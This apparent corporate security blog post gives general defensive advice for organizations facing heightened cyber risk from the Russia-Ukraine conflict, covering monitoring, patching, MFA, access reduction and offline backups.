As a result of the escalated conflict between Ukraine and Russia, the risk of possible cyber attacks on Western organizations is particularly high. In particular, organizations in critical infrastructure sectors that provide essential services need to be on high alert. In recent weeks, Russian threat groups have already demonstrated their capabilities when it comes to attacking nation states by targeting the Ukrainian government and financial institutions.
National cybersecurity agencies around the world have issued guidelines regarding the threats from Russia. These guidelines come from the CISA in the United States, NCSC in the United Kingdom, and CCB in Belgium. We do not currently have specific threat intelligence that attacks outside Ukraine would occur, but we need to upgrade our security to be safe.
Read more: shlomo rechnitz – founder of twinmed
Emergency security advice
Talk to your cybersecurity staff and partners about how to quickly secure your assets. You may have difficulty determining priorities. The answer is simple: everything has priority . Spot it recommends the following guidelines for all organizations:
Leverage your Chief Information Security Officer (CISO) and the team
Your CISO is a cybersecurity expert and should be empowered to make executive decisions about your security policies. He/she must:
- Enforce internal security policies
- Tighten domain block lists
- Prioritize and delegate the implementation of security measures
- Create and test an incident response plan
Closing visibility gaps
- Make sure you actively monitor every asset on every domain. The following 5 points are an absolute minimum of controls that an organization must have:
- EDR/XDR for each endpoint
- Email security
- DNS monitoring and blocking
- Firewall and IDS/IPS logs
- Active Directory domain(s) security controls
- Ensure that these logs are centrally collected and monitored for suspicious activity by your internal/external SOC.
- Go through the logs daily for unexpected behavior, such as:
- Outgoing connections to unknown domains and IPs
- New or uncategorized domains
- TOR traffic
- Log4j payloads
- Guest wifi users
Ideally, every asset within your organization for which a security update has been released by the supplier will also be immediately patched. It’s about:
- All computers – Windows, Mac, Linux/Unix, Chromebooks, …
- All smartphones and tablets
- Firewalls and network hardware
- IoT devices
- CCTV system
- Access control, door systems, …
In reality, many organizations struggle to effectively implement a patch management policy that covers everything in a timely manner. This is where a vulnerability management solution can come in handy. A good vulnerability management solution helps identify which patches should be installed first to reduce the biggest risks for the organization, so that the IT team can use the available time efficiently.
Switch to short-term priorities
- Have your cyber emergency plan ready. We recommend developing, updating and testing your incident response plan.
- If you planned a security update for the next year, do it now! Even if that means working overtime.
- Deploy MFA everywhere (especially for remote access services) and consider moving to hardware-driven MFA devices for administrative accounts.
- Reduce access to systems only for personnel who actually need access. Also for SharePoint, OneDrive and other cloud storage solutions.
- Delete old unnecessary or unused accounts, especially from staff who have left the company.
- Reduce the external attack surface by disabling unused or non-critical ports.
- Back up critical devices and information and keep them offline. Please ensure that the process to restore these backups is tested regularly.